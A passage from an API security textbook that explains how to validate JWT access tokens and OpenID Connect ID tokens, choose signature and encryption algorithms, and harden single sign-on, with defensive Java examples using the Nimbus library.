➥ fKNI45nU7E7COAh8gjn6LCXfug57EQfi0gOgKhOhVcLmKqIEXPmqeagvMndsXWIy6k8WP
➥ PwBzSkN5PDLKBXKG_X1BwVvOE9276nrx6lJq3CgNbmiEihovNt_6g5pCxiSarIk2uaG3T
➥ 3Ve6hUJrM0W35QmqrNM9rL3laPgXtCuz4sJJN3rGnQq_25YbUawW9L1MTVbqKxWiyN5Wb
➥ XoWUg8to1DhoQnXzDymIMhFa45NTLhxtdH9CDprXWXWBaWzo8mIFes5yI4AJW4ZSg1PPO
➥ 2UJSQ",
"e": "AQAB",
"alg": "RS256"
}
]}
Many JWT libraries have built-in support for retrieving keys from a JWK Set over
HTTPS, including periodically refreshing them. For example, the Nimbus JWT library
that you used in chapter 6 supports retrieving keys from a JWK Set URI using the
RemoteJWKSet class:
var jwkSetUri = URI.create("https://as.example.com:8443/jwks_uri");
var jwkSet = new RemoteJWKSet<>(jwkSetUri.toURL());
Listing 7.11 shows the configuration of a new SignedJwtAccessTokenStore that will
validate an access token as a signed JWT. The constructor takes a URI for the end-
point on the AS to retrieve the JWK Set from and constructs a RemoteJWKSet based on
this. It also takes in the expected issuer and audience values of the JWT, and the JWS
signature algorithm that will be used. As you’ll recall from chapter 6, there are attacks
on JWT verification if the wrong algorithm is used, so you should always strictly vali-
date that the algorithm header has an expected value. Open the src/main/java/com/
manning/apisecurityinaction/token folder and create a new file SignedJwtAccess-
TokenStore.java with the contents of listing 7.11. You’ll fill in the details of the read
method shortly.
TIP
If the AS supports discovery (see section 7.2.3), then it may advertise its
JWK Set URI as the jwks_uri field of the discovery document.
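
If you want to resolve the JWK Set URI dynamically, a sketch like the following could fetch it from the discovery document; the .well-known path here follows RFC 8414, so check which discovery document your AS actually publishes:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import org.json.JSONObject;

class Discovery {
    // Look up the jwks_uri advertised in the AS discovery document.
    static URI jwkSetUri(String issuer) throws Exception {
        var discovery = URI.create(issuer +
                "/.well-known/oauth-authorization-server");
        var response = HttpClient.newHttpClient().send(
                HttpRequest.newBuilder(discovery).GET().build(),
                HttpResponse.BodyHandlers.ofString());
        return URI.create(new JSONObject(response.body())
                .getString("jwks_uri"));
    }
}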
Listing 7.11 The SignedJwtAccessTokenStore

package com.manning.apisecurityinaction.token;

import com.nimbusds.jose.*;
import com.nimbusds.jose.jwk.source.*;
import com.nimbusds.jose.proc.*;
import com.nimbusds.jwt.proc.DefaultJWTProcessor;
import spark.Request;

import java.net.*;
import java.text.ParseException;
import java.util.Optional;

public class SignedJwtAccessTokenStore implements SecureTokenStore {

    private final String expectedIssuer;
    private final String expectedAudience;
    private final JWSAlgorithm signatureAlgorithm;
    private final JWKSource<SecurityContext> jwkSource;

    // Configure the expected issuer, audience, and JWS algorithm.
    public SignedJwtAccessTokenStore(String expectedIssuer,
            String expectedAudience,
            JWSAlgorithm signatureAlgorithm,
            URI jwkSetUri)
            throws MalformedURLException {
        this.expectedIssuer = expectedIssuer;
        this.expectedAudience = expectedAudience;
        this.signatureAlgorithm = signatureAlgorithm;
        // Construct a RemoteJWKSet to retrieve keys from the JWK Set URI.
        this.jwkSource = new RemoteJWKSet<>(jwkSetUri.toURL());
    }

    @Override
    public String create(Request request, Token token) {
        throw new UnsupportedOperationException();
    }

    @Override
    public void revoke(Request request, String tokenId) {
        throw new UnsupportedOperationException();
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        // See listing 7.12
    }
}
A JWT access token can be validated by configuring the processor class to use the
RemoteJWKSet as the source for verification keys (ES256 is an example of a JWS signa-
ture algorithm):
var verifier = new DefaultJWTProcessor<>();
var keySelector = new JWSVerificationKeySelector<>(
JWSAlgorithm.ES256, jwkSet);
verifier.setJWSKeySelector(keySelector);
var claims = verifier.process(tokenId, null);
After verifying the signature and the expiry time of the JWT, the processor returns the
JWT Claims Set. You can then verify that the other claims are correct. You should
check that the JWT was issued by the AS by validating the iss claim, and that the
access token is meant for this API by ensuring that an identifier for the API appears in
the audience (aud) claim (listing 7.12).
In the normal OAuth2 flow, the AS is not informed by the client which APIs it intends to use the access token for (as you might expect by now, there is a proposal to allow the client to indicate the resource servers it intends to access: http://mng.bz/6ANG), and so the audience claim can vary from one AS to another. Consult the documentation for your AS software to configure the intended
audience. Another area of disagreement between AS software is in how the scope of
the token is communicated. Some AS software produces a string scope claim, whereas
others produce a JSON array of strings. Some others may use a different field entirely,
such as scp or scopes. Listing 7.12 shows how to handle a scope claim that may either
be a string or an array of strings. Open SignedJwtAccessTokenStore.java in your editor
again and update the read method based on the listing.
Listing 7.12 Validating signed JWT access tokens

@Override
public Optional<Token> read(Request request, String tokenId) {
    try {
        // Verify the signature first.
        var verifier = new DefaultJWTProcessor<>();
        var keySelector = new JWSVerificationKeySelector<>(
                signatureAlgorithm, jwkSource);
        verifier.setJWSKeySelector(keySelector);
        var claims = verifier.process(tokenId, null);

        // Ensure the issuer and audience have expected values.
        if (!expectedIssuer.equals(claims.getIssuer())) {
            return Optional.empty();
        }
        if (!claims.getAudience().contains(expectedAudience)) {
            return Optional.empty();
        }

        // Extract the JWT subject and expiry time.
        var expiry = claims.getExpirationTime().toInstant();
        var subject = claims.getSubject();
        var token = new Token(expiry, subject);

        // The scope may be either a string or an array of strings.
        String scope;
        try {
            scope = claims.getStringClaim("scope");
        } catch (ParseException e) {
            scope = String.join(" ",
                    claims.getStringListClaim("scope"));
        }
        token.attributes.put("scope", scope);
        return Optional.of(token);
    } catch (ParseException | BadJOSEException | JOSEException e) {
        return Optional.empty();
    }
}
CHOOSING A SIGNATURE ALGORITHM
The JWS standard that JWT uses for signatures supports many different public key sig-
nature algorithms, summarized in table 7.2. Because public key signature algorithms
are expensive and usually limited in the amount of data that can be signed, the con-
tents of the JWT is first hashed using a cryptographic hash function and then the hash
value is signed. JWS provides variants for different hash functions when using the
same underlying signature algorithm. All the allowed hash functions provide ade-
quate security, but SHA-512 is the most secure and may be slightly faster than the
other choices on 64-bit systems. The exception to this rule is when using ECDSA sig-
natures, because JWS specifies elliptic curves to use along with each hash function;
the curve used with SHA-512 has a significant performance penalty compared with the
curve used for SHA-256.
Of these choices, the best is EdDSA, based on the Edwards Curve Digital Signature
Algorithm (https://tools.ietf.org/html/rfc8037). EdDSA signatures are fast to pro-
duce and verify, produce compact signatures, and are designed to be implemented
securely against side-channel attacks. Not all JWT libraries or AS software supports
EdDSA signatures yet. The older ECDSA standard for elliptic curve digital signatures
has wider support, and shares some of the same properties as EdDSA, but is slightly
slower and harder to implement securely.
WARNING
ECDSA signatures require a unique random nonce for each signa-
ture. If a nonce is repeated, or even just a few bits are not completely random,
then the private key can be reconstructed from the signature values. This
kind of bug was used to hack the Sony PlayStation 3 and to steal Bitcoin cryptocurrency from wallets on Android mobile phones, among many other cases.
Deterministic ECDSA signatures (https://tools.ietf.org/html/rfc6979) can be
used to prevent this, if your library supports them. EdDSA signatures are also
immune to this issue.
RSA signatures are expensive to produce, especially for secure key sizes (a 3072-bit
RSA key is roughly equivalent to a 256-bit elliptic curve key or a 128-bit HMAC key)
and produce much larger signatures than the other options, resulting in larger JWTs.
Table 7.2 JWS signature algorithms

JWS Algorithm  Hash function        Signature algorithm
RS256          SHA-256              RSA with PKCS#1 v1.5 padding
RS384          SHA-384              RSA with PKCS#1 v1.5 padding
RS512          SHA-512              RSA with PKCS#1 v1.5 padding
PS256          SHA-256              RSA with PSS padding
PS384          SHA-384              RSA with PSS padding
PS512          SHA-512              RSA with PSS padding
ES256          SHA-256              ECDSA with the NIST P-256 curve
ES384          SHA-384              ECDSA with the NIST P-384 curve
ES512          SHA-512              ECDSA with the NIST P-521 curve
EdDSA          SHA-512 / SHAKE256   EdDSA with either the Ed25519 or Ed448 curves
On the other hand, RSA signatures can be validated very quickly. The variants of RSA
using PSS padding should be preferred over those using the older PKCS#1 version 1.5
padding but may not be supported by all libraries.
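
As a brief illustration of producing such tokens, the following sketch uses the Nimbus library (introduced in chapter 6) to sign a JWT access token with ES256. The key is generated on the fly purely for demonstration; a real AS would load its long-term private key instead:

import com.nimbusds.jose.JWSAlgorithm;
import com.nimbusds.jose.JWSHeader;
import com.nimbusds.jose.crypto.ECDSASigner;
import com.nimbusds.jose.jwk.Curve;
import com.nimbusds.jose.jwk.gen.ECKeyGenerator;
import com.nimbusds.jwt.JWTClaimsSet;
import com.nimbusds.jwt.SignedJWT;
import java.util.Date;

public class SignAccessToken {
    public static void main(String... args) throws Exception {
        // For demonstration only: generate a fresh P-256 key pair.
        var key = new ECKeyGenerator(Curve.P_256).generate();
        var claims = new JWTClaimsSet.Builder()
                .subject("alice")
                .issuer("https://as.example.com")
                .audience("https://api.example.com")
                .expirationTime(new Date(System.currentTimeMillis() + 3600_000))
                .claim("scope", "read_messages")
                .build();
        var jwt = new SignedJWT(
                new JWSHeader.Builder(JWSAlgorithm.ES256)
                        .keyID(key.getKeyID()).build(),
                claims);
        jwt.sign(new ECDSASigner(key));
        System.out.println(jwt.serialize());
    }
}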
7.4.5 Encrypted JWT access tokens
In chapter 6, you learned that authenticated encryption can be used to provide the
benefits of encryption to hide confidential attributes and authentication to ensure
that a JWT is genuine and has not been tampered with. Encrypted JWTs can be useful
for access tokens too, because the AS may want to include attributes in the access
token that are useful for the API for making access control decisions, but which
should be kept confidential from third-party clients or from the user themselves. For
example, the AS may include the resource owner’s email address in the token for use
by the API, but this information should not be leaked to the third-party client. In this
case the AS can encrypt the access token JWT by using an encryption key that only the
API can decrypt.
Unfortunately, none of the public key encryption algorithms supported by the
JWT standards provide authenticated encryption, because this is less often implemented for public key cryptography. (I have proposed adding public key authenticated encryption to JOSE and JWT, but the proposal is still a draft at this stage; see http://mng.bz/oRGN.)
dentiality and so must be combined with a digital signature to ensure the JWT is not
tampered with or forged. This is done by first signing the claims to produce a signed
JWT, and then encrypting that signed JWT to produce a nested JOSE structure (fig-
ure 7.9). The downside is that the resulting JWT is much larger than it would be if it
was just signed and requires two expensive public key operations to first decrypt the
outer encrypted JWE and then verify the inner signed JWT. You shouldn’t use the same
key for encryption and signing, even if the algorithms are compatible.
The JWE specifications include several public key encryption algorithms, shown in
table 7.3. The details of the algorithms can be complicated, and several variations are
included. If your software supports it, it’s best to avoid the RSA encryption algorithms
entirely and opt for ECDH-ES encryption. ECDH-ES is based on Elliptic Curve Diffie-
Hellman key agreement, and is a secure and performant choice, especially when used
with the X25519 or X448 elliptic curves (https://tools.ietf.org/html/rfc8037), but
these are not yet widely supported by JWT libraries.
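To make the nested sign-then-encrypt structure concrete, here is a hedged sketch, again assuming the Nimbus JOSE+JWT library (with its optional Tink dependency for X25519 support); the inputs, a signed JWT and the API's X25519 public key, are assumed to come from earlier steps:

import com.nimbusds.jose.EncryptionMethod;
import com.nimbusds.jose.JOSEException;
import com.nimbusds.jose.JWEAlgorithm;
import com.nimbusds.jose.JWEHeader;
import com.nimbusds.jose.JWEObject;
import com.nimbusds.jose.Payload;
import com.nimbusds.jose.crypto.X25519Encrypter;
import com.nimbusds.jose.jwk.OctetKeyPair;
import com.nimbusds.jwt.SignedJWT;

public class NestedJwtSketch {
    // Encrypt an already-signed JWT to the API's X25519 public key,
    // producing the nested JOSE structure shown in figure 7.9.
    public static String signThenEncrypt(SignedJWT signedJwt,
            OctetKeyPair apiPublicKey) throws JOSEException {
        var header = new JWEHeader.Builder(
                JWEAlgorithm.ECDH_ES, EncryptionMethod.A256GCM)
                .contentType("JWT")   // signals a nested JWT to the recipient
                .build();
        var jwe = new JWEObject(header, new Payload(signedJwt));
        jwe.encrypt(new X25519Encrypter(apiPublicKey));
        return jwe.serialize();
    }
}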
10  I have proposed adding public key authenticated encryption to JOSE and JWT, but the proposal is still a draft at this stage. See http://mng.bz/oRGN.
Table 7.3  JOSE public key encryption algorithms

  RSA1_5 (RSA with PKCS#1 v1.5 padding)
      This mode is insecure and should not be used.
  RSA-OAEP (RSA with OAEP padding using SHA-1)
  RSA-OAEP-256 (RSA with OAEP padding using SHA-256)
      OAEP is secure but RSA decryption is slow, and encryption produces large JWTs.
  ECDH-ES (Elliptic Curve Integrated Encryption Scheme, ECIES)
  ECDH-ES+A128KW, ECDH-ES+A192KW, ECDH-ES+A256KW (ECDH-ES with an extra AES key-wrapping step)
      A secure encryption algorithm, but the epk header it adds can be bulky. Best when used with the X25519 or X448 curves.

WARNING  Most of the JWE algorithms are secure, apart from RSA1_5 which uses the older PKCS#1 version 1.5 padding algorithm. There are known attacks against this algorithm, so you should not use it. This padding mode was replaced by Optimal Asymmetric Encryption Padding (OAEP) that was standardized in version 2 of PKCS#1. OAEP uses a hash function internally, so there are two variants included in JWE: one using SHA-1, and one using SHA-256. Because SHA-1 is no longer considered secure, you should prefer the SHA-256 variant, although there are no known attacks against it when used with OAEP. However, even OAEP has some downsides because it's a complicated algorithm and less widely implemented. RSA encryption also produces larger ciphertext than other modes and the decryption operation is very slow, which is a problem for an access token that may need to be decrypted many times.

[Figure 7.9 diagram: the JWT claims are first signed (for example with ES256) to produce a signed JWT, which is then encrypted (for example with ECDH-ES) to produce the final JWE, using separate keys for signing and encryption.]
Figure 7.9  When using public key cryptography, a JWT needs to be first signed and then encrypted to ensure confidentiality and integrity as no standard algorithm provides both properties. You should use separate keys for signing and encryption even if the algorithms are compatible.
7.4.6  Letting the AS decrypt the tokens
An alternative to using public key signing and encryption would be for the AS to
encrypt access tokens with a symmetric authenticated encryption algorithm, such as
the ones you learned about in chapter 6. Rather than sharing this symmetric key with
every API, the APIs instead call the token introspection endpoint to validate the token
rather than verifying it locally. Because the AS does not need to perform a database
lookup to validate the token, it may be easier to horizontally scale the AS in this case
by adding more servers to handle increased traffic.
This pattern allows the format of access tokens to change over time because only
the AS validates tokens. In software engineering terms, the choice of token format is
encapsulated by the AS and hidden from resource servers, while with public key
signed JWTs, each API knows how to validate tokens, making it much harder to change
the representation later. More sophisticated patterns for managing access tokens for
microservice environments are covered in part 4.
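As a concrete sketch of this pattern (the endpoint URI and the API's client credentials are placeholders; real values come from registering the API with the AS), validating a token is a single HTTPS call using Java's built-in HTTP client:

import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class IntrospectionSketch {
    public static void main(String[] args) throws Exception {
        var token = args[0];   // the access token presented to the API
        // Authenticate to the AS with the API's own client credentials.
        var credentials = Base64.getEncoder().encodeToString(
                "api-client:api-secret".getBytes(StandardCharsets.UTF_8));
        var form = "token=" + URLEncoder.encode(token, StandardCharsets.UTF_8);
        var request = HttpRequest.newBuilder(
                    URI.create("https://as.example.com/introspect"))
                .header("Content-Type", "application/x-www-form-urlencoded")
                .header("Authorization", "Basic " + credentials)
                .POST(HttpRequest.BodyPublishers.ofString(form))
                .build();
        var response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        // The JSON response contains an "active" field and, if true,
        // the token's scope, subject, expiry, and other attributes.
        System.out.println(response.body());
    }
}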
7.5  Single sign-on
One of the advantages of OAuth2 is the ability to centralize authentication of users at
the AS, providing a single sign-on (SSO) experience (figure 7.10). When the user’s cli-
ent needs to access an API, it redirects the user to the AS authorization endpoint to
get an access token. At this point the AS authenticates the user and asks for consent
for the client to be allowed access. Because this happens within a web browser, the AS
typically creates a session cookie, so that the user does not have to log in again.
Pop quiz
8  Which key is used to validate a public key signature?
   a  The public key
   b  The private key
The answer is at the end of the chapter.

If the user then starts using a different client, such as a different web application, they will be redirected to the AS again. But this time the AS will see the existing session cookie and won't prompt the user to log in. This even works for mobile apps from different developers if they are installed on the same device and use the system browser
for OAuth flows, as recommended in section 7.3. The AS may also remember which
scopes a user has granted to clients, allowing the consent screen to be skipped when a
user returns to that client. In this way, OAuth can provide a seamless SSO experience
for users replacing traditional SSO solutions. When the user logs out, the client can
revoke their access or refresh token using the OAuth token revocation endpoint,
which will prevent further access.
WARNING  Though it might be tempting to reuse a single access token to provide access to many different APIs within an organization, this increases the risk if a token is ever stolen. Prefer to use separate access tokens for each different API.
[Figure 7.10 diagram: a web browser client and a mobile app client both delegate to a single authorization server to authenticate the user and manage tokens; all of the APIs call one token introspection endpoint on the AS to validate access tokens; if the user has an existing session with the AS, they don't need to log in again to approve a new access token.]
Figure 7.10  OAuth2 enables single sign-on for users. As clients delegate to the AS to get access tokens, the AS is responsible for authenticating all users. If the user has an existing session with the AS, then they don't need to be authenticated again, providing a seamless SSO experience.
7.6  OpenID Connect
OAuth can provide basic SSO functionality, but the primary focus is on delegated third-party access to APIs rather than user identity or session management. The OpenID Connect (OIDC) suite of standards (https://openid.net/developers/specs/) extends OAuth2 with several features:

- A standard way to retrieve identity information about a user, such as their name, email address, postal address, and telephone number. The client can access a UserInfo endpoint to retrieve identity claims as JSON using an OAuth2 access token with standard OIDC scopes (see the sketch after this list).
- A way for the client to request that the user is authenticated even if they have an existing session, and to ask for them to be authenticated in a particular way, such as with two-factor authentication. While obtaining an OAuth2 access token may involve user authentication, it's not guaranteed that the user was even present when the token was issued or how recently they logged in. OAuth2 is primarily a delegated access protocol, whereas OIDC provides a full authentication protocol. If the client needs to positively authenticate a user, then OIDC should be used.
- Extensions for session management and logout, allowing clients to be notified when a user logs out of their session at the AS, enabling the user to log out of all clients at once (known as single logout).
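As a rough sketch of the first feature (the endpoint URI and the claims shown are hypothetical; a real client discovers the UserInfo endpoint from the OP's metadata), the call is a plain HTTPS request authorized with the access token:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class UserInfoSketch {
    public static void main(String[] args) throws Exception {
        var accessToken = args[0];   // obtained via the authorization code flow
        var request = HttpRequest.newBuilder(
                    URI.create("https://as.example.com/userinfo"))
                .header("Authorization", "Bearer " + accessToken)
                .GET()
                .build();
        var response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());
        // The body is a JSON object of identity claims, for example:
        // {"sub":"alice","name":"Alice","email":"alice@example.com"}
        System.out.println(response.body());
    }
}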
Although OIDC is an extension of OAuth, it rearranges the pieces a bit because the
API that the client wants to access (the UserInfo endpoint) is part of the AS itself (fig-
ure 7.11). In a normal OAuth2 flow, the client would first talk to the AS to obtain an
access token and then talk to the API on a separate resource server.
DEFINITION  In OIDC, the AS and RS are combined into a single entity known as an OpenID Provider (OP). The client is known as a Relying Party (RP).
The most common use of OIDC is for a website or app to delegate authentication to a
third-party identity provider. If you’ve ever logged into a website using your Google or
Facebook account, you’re using OIDC behind the scenes, and many large social media
companies now support this.
7.6.1  ID tokens
If you follow the OAuth2 recommendations in this chapter, then finding out who a
user is involves three roundtrips to the AS for the client:
1  First, the client needs to call the authorization endpoint to get an authorization code.
2  Then the client exchanges the code for an access token.
3  Finally, the client can use the access token to call the UserInfo endpoint to retrieve the identity claims for the user.
This is a lot of overhead before you even know the user’s name, so OIDC provides a
way to return some of the identity and authentication claims about a user as a new
type of token known as an ID token, which is a signed and optionally encrypted JWT.
This token can be returned directly from the token endpoint in step 2, or even
directly from the authorization endpoint in step 1, in a variant of the implicit flow.
There is also a hybrid flow in which the authorization endpoint returns an ID token
directly along with an authorization code that the client can then exchange for an
access token.
DEFINITION  An ID token is a signed and optionally encrypted JWT that contains identity and authentication claims about a user.
To validate an ID token, the client should first process the token as a JWT, decrypting
it if necessary and verifying the signature. When a client registers with an OIDC pro-
vider, it specifies the ID token signing and encryption algorithms it wants to use and
can supply public keys to be used for encryption, so the client should ensure that the
received ID token uses these algorithms. The client should then verify the standard JWT claims in the ID token, such as the expiry, issuer, and audience values as described in chapter 6. OIDC defines several additional claims that should also be verified, described in table 7.4.

[Figure 7.11 diagram: in normal OAuth there are three entities (the client, the AS, and the API on a separate resource server); in OpenID Connect the client accesses the UserInfo endpoint on the AS itself.]
Figure 7.11  In OpenID Connect, the client accesses APIs on the AS itself, so there are only two entities involved compared to the three in normal OAuth. The client is known as the Relying Party (RP), while the combined AS and API is known as an OpenID Provider (OP).
When requesting authentication, the client can use extra parameters to the authoriza-
tion endpoint to indicate how the user should be authenticated. For example, the
max_age parameter can be used to indicate how recently the user must have authen-
ticated to be allowed to reuse an existing login session at the OP, and the acr_values
parameter can be used to indicate acceptable authentication levels of assurance. The
prompt=login parameter can be used to force reauthentication even if the user has an
existing session that would satisfy any other constraints specified in the authentication
request, while prompt=none can be used to check if the user is currently logged in
without authenticating them if they are not.
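For illustration, a client might build the authorization request like this (the client ID, redirect URI, and acr value are placeholders, not values defined by OIDC):

import java.net.URI;
import java.net.URLEncoder;
import static java.nio.charset.StandardCharsets.UTF_8;

public class AuthRequestSketch {
    public static URI buildAuthorizationRequest() {
        return URI.create("https://as.example.com/authorize" +
                "?response_type=code" +
                "&scope=openid" +
                "&client_id=test" +
                "&redirect_uri=" + URLEncoder.encode(
                        "https://client.example.net/callback", UTF_8) +
                "&max_age=300" +        // reuse a login only if under 5 minutes old
                "&acr_values=" + URLEncoder.encode("urn:example:2fa", UTF_8) +
                "&prompt=login");       // force fresh authentication
    }
}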
WARNING  Just because a client requested that a user be authenticated in a certain way does not mean that they will be. Because the request parameters are exposed as URL query parameters in a redirect, the user could alter them to remove some constraints. The OP may not be able to satisfy all requests for other reasons. The client should always check the claims in an ID token to make sure that any constraints were satisfied.
Table 7.4  ID token standard claims

  azp (Authorized Party)
      An ID token can be shared with more than one party and so have multiple values in the audience claim. The azp claim lists the client the ID token was initially issued to. A client directly interacting with an OIDC provider should verify that it's the authorized party if more than one party is in the audience.
  auth_time (User authentication time)
      The time at which the user was authenticated as seconds from the UNIX epoch.
  nonce (Anti-replay nonce)
      A unique random value that the client sends in the authentication request. The client should verify that the same value is included in the ID token to prevent replay attacks; see section 7.6.2 for details.
  acr (Authentication Context Class Reference)
      Indicates the overall strength of the user authentication performed. This is a string and specific values are defined by the OP or by other standards.
  amr (Authentication Methods References)
      An array of strings indicating the specific methods used. For example, it might contain ["password", "otp"] to indicate that the user supplied a password and a one-time password.
7.6.2  Hardening OIDC
While an ID token is protected against tampering by the cryptographic signature,
there are still several possible attacks when an ID token is passed back to the client in
the URL from the authorization endpoint in either the implicit or hybrid flows:
- The ID token might be stolen by a malicious script running in the same browser, or it might leak in server access logs or the HTTP Referer header. Although an ID token does not grant access to any API, it may contain personal or sensitive information about the user that should be protected.
- An attacker may be able to capture an ID token from a legitimate login attempt and then replay it later to attempt to log in as a different user. A cryptographic signature guarantees only that the ID token was issued by the correct OP but does not by itself guarantee that it was issued in response to this specific request.
The simplest defense against these attacks is to use the authorization code flow with
PKCE as recommended for all OAuth2 flows. In this case the ID token is only issued
by the OP from the token endpoint in response to a direct HTTPS request from the
client. If you decide to use a hybrid flow to receive an ID token directly in the redirect
back from the authorization endpoint, then OIDC includes several protections that
can be employed to harden the flow:
- The client can include a random nonce parameter in the request and verify that the same nonce is included in the ID token that is received in response. This prevents replay attacks as the nonce in a replayed ID token will not match the fresh value sent in the new request. The nonce should be randomly generated and stored on the client just like the OAuth state parameter and the PKCE code_challenge (a generation sketch follows the tip below). (Note that the nonce parameter is unrelated to a nonce used in encryption as covered in chapter 6.)
- The client can request that the ID token is encrypted using a public key supplied during registration or using AES encryption with a key derived from the client secret. This prevents sensitive personal information being exposed if the ID token is intercepted. Encryption alone does not prevent replay attacks, so an OIDC nonce should still be used in this case.
- The ID token can include c_hash and at_hash claims that contain cryptographic hashes of the authorization code and access token associated with a request. The client can compare these to the actual authorization code and access token it receives to make sure that they match. Together with the nonce and cryptographic signature, this effectively prevents an attacker swapping the authorization code or access token in the redirect URL when using the hybrid or implicit flows.
TIP  You can use the same random value for the OAuth state and OIDC nonce parameters to avoid having to generate and store both on the client.
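A minimal sketch of generating such a value (any cryptographically secure random source works; the helper name is made up):

import java.security.SecureRandom;
import java.util.Base64;

public class NonceSketch {
    private static final SecureRandom RANDOM = new SecureRandom();

    // Generate 160 bits of randomness, URL-safe encoded, suitable for the
    // OIDC nonce (and the OAuth state) parameter. Store it on the client
    // before the redirect, then compare it with the nonce claim in the
    // returned ID token.
    public static String generateNonce() {
        var bytes = new byte[20];
        RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }
}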
The additional protections provided by OIDC can mitigate many of the problems with
the implicit grant. But they come at a cost of increased complexity compared with the
authorization code grant with PKCE, because the client must perform several com-
plex cryptographic operations and check many details of the ID token during valida-
tion. With the auth code flow and PKCE, the checks are performed by the OP when
the code is exchanged for access and ID tokens.
7.6.3  Passing an ID token to an API
Given that an ID token is a JWT and is intended to authenticate a user, it's tempting to use it for authenticating users to your API. This can be a convenient pattern for
first-party clients, because the ID token can be used directly as a stateless session
token. For example, the Natter web UI could use OIDC to authenticate a user and
then store the ID token as a cookie or in local storage. The Natter API would then be
configured to accept the ID token as a JWT, verifying it with the public key from the
OP. An ID token is not appropriate as a replacement for access tokens when dealing
with third-party clients for the following reasons:
- ID tokens are not scoped, and the user is asked only for consent for the client to access their identity information. If the ID token can be used to access APIs then any client with an ID token can act as if they are the user without any restrictions.
- An ID token authenticates a user to the client and is not intended to be used by that client to access an API. For example, imagine if Google allowed access to its APIs based on an ID token. In that case, any website that allowed its users to log in with their Google account (using OIDC) would then be able to replay the ID token back to Google's own APIs to access the user's data without their consent. To prevent these kinds of attacks, an ID token has an audience claim that only lists the client. An API should reject any JWT that does not list that API in the audience.
- If you're using the implicit or hybrid flows, then the ID token is exposed in the URL during the redirect back from the OP. When an ID token is used for access control, this has the same risks as including an access token in the URL as the token may leak or be stolen.
You should therefore not use ID tokens to grant access to an API.
NOTE  Never use ID tokens for access control for third-party clients. Use access tokens for access and ID tokens for identity. ID tokens are like usernames; access tokens are like passwords.
Although you shouldn’t use an ID token to allow access to an API, you may need to
look up identity information about a user while processing an API request or need to
enforce specific authentication requirements. For example, an API for initiating
financial transactions may want assurance that the user has been freshly authenticated
using a strong authentication mechanism. Although this information can be returned
from a token introspection request, this is not always supported by all authorization
server software. OIDC ID tokens provide a standard token format to verify these
requirements. In this case, you may want to let the client pass in a signed ID token that
it has obtained from a trusted OP. When this is allowed, the API should accept the ID
token only in addition to a normal access token and make all access control decisions
based on the access token.
When the API needs to access claims in the ID token, it should first verify that it’s
from a trusted OP by validating the signature and issuer claims. It should also ensure
that the subject of the ID token exactly matches the resource owner of the access
token or that there is some other trust relationship between them. Ideally, the API
should then ensure that its own identifier is in the audience of the ID token and that
the client’s identifier is the authorized party (azp claim), but not all OP software sup-
ports setting these values correctly in this case. Listing 7.13 shows an example of vali-
dating the claims in an ID token against those in an access token that has already been
used to authenticate the request. Refer to the SignedJwtAccessToken store for details
on configuring the JWT verifier.
Listing 7.13  Validating an ID token

// Extract the ID token from the request and verify its signature.
var idToken = request.headers("X-ID-Token");
var claims = verifier.process(idToken, null);

// Ensure the token is from a trusted issuer and that this API is
// the intended audience.
if (!expectedIssuer.equals(claims.getIssuer())) {
    throw new IllegalArgumentException("invalid id token issuer");
}
if (!claims.getAudience().contains(expectedAudience)) {
    throw new IllegalArgumentException("invalid id token audience");
}

// If the ID token has an azp claim, then ensure it's for the same
// client that is calling the API.
var client = request.attribute("client_id");
var azp = claims.getStringClaim("azp");
if (client != null && azp != null && !azp.equals(client)) {
    throw new IllegalArgumentException("client is not authorized party");
}

// Check that the subject of the ID token matches the resource owner
// of the access token.
var subject = request.attribute("subject");
if (!subject.equals(claims.getSubject())) {
    throw new IllegalArgumentException("subject does not match id token");
}

// Store the verified ID token claims in the request attributes for
// further processing.
request.attribute("id_token.claims", claims);
Answers to pop quiz questions
1  d and e. Whether scopes or permissions are more fine-grained varies from case to case.
2  a and e. The implicit grant is discouraged because of the risk of access tokens being stolen. The ROPC grant is discouraged because the client learns the user's password.
3  a. Mobile apps should be public clients because any credentials embedded in the app download can be easily extracted by users.
4  a. Claimed HTTPS URIs are more secure.
5  True. PKCE provides security benefits in all cases and should always be used.
6  d.
7  c.
8  a. The public key is used to validate a signature.
Summary
- Scoped tokens allow clients to be given access to some parts of your API but not others, allowing users to delegate limited access to third-party apps and services.
- The OAuth2 standard provides a framework for third-party clients to register with your API and negotiate access with user consent.
- All user-facing API clients should use the authorization code grant with PKCE to obtain access tokens, whether they are traditional web apps, SPAs, mobile apps, or desktop apps. The implicit grant should no longer be used.
- The standard token introspection endpoint can be used to validate an access token, or JWT-based access tokens can be used to reduce network roundtrips.
- Refresh tokens can be used to keep token lifetimes short without disrupting the user experience.
- The OpenID Connect standard builds on top of OAuth2, providing a comprehensive framework for offloading user authentication to a dedicated service.
- ID tokens can be used for user identification but should be avoided for access control.
8  Identity-based access control

This chapter covers
- Organizing users into groups
- Simplifying permissions with role-based access control
- Implementing more complex policies with attribute-based access control
- Centralizing policy management with a policy engine

As Natter has grown, the number of access control list (ACL; chapter 3) entries has grown too. ACLs are simple, but as the number of users and objects that can be accessed through an API grows, the number of ACL entries grows along with them. If you have a million users and a million objects, then in the worst case you could end up with a billion ACL entries listing the individual permissions of each user for each object. Though that approach can work with fewer users, it becomes more of a problem as the user base grows. This problem is particularly bad if permissions are centrally managed by a system administrator (mandatory access control, or MAC, as discussed in chapter 7), rather than determined by individual users (discretionary access control, or DAC). If permissions are not removed when no longer required, users can end up accumulating privileges, violating the principle of least privilege. In this chapter you'll learn about alternative ways of organizing permissions in the identity-based access control model. In chapter 9, we'll look at alternative non-identity-based access control models.
DEFINITION  Identity-based access control (IBAC) determines what you can do based on who you are. The user performing an API request is first authenticated and then a check is performed to see if that user is authorized to perform the requested action.
8.1  Users and groups
One of the most common approaches to simplifying permission management is to
collect related users into groups, as shown in figure 8.1. Rather than the subject of an
access control decision always being an individual user, groups allow permissions to be
assigned to collections of users. There is a many-to-many relationship between users
